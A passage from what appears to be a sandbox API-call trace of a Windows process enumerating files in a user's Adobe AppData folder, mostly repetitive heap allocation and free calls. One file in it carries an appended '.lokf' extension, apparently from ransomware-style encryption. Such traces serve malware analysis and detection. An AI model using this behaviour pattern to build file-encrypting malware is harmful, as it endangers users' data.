"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.lokf")) returned 1 [0061.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.219] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.220] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.220] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.220] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262f18 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262d20 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262f18 | out: hHeap=0x660000) returned 1 [0061.220] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0061.220] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adf40 | out: hHeap=0x660000) returned 1 [0061.220] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262f18 [0061.220] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: 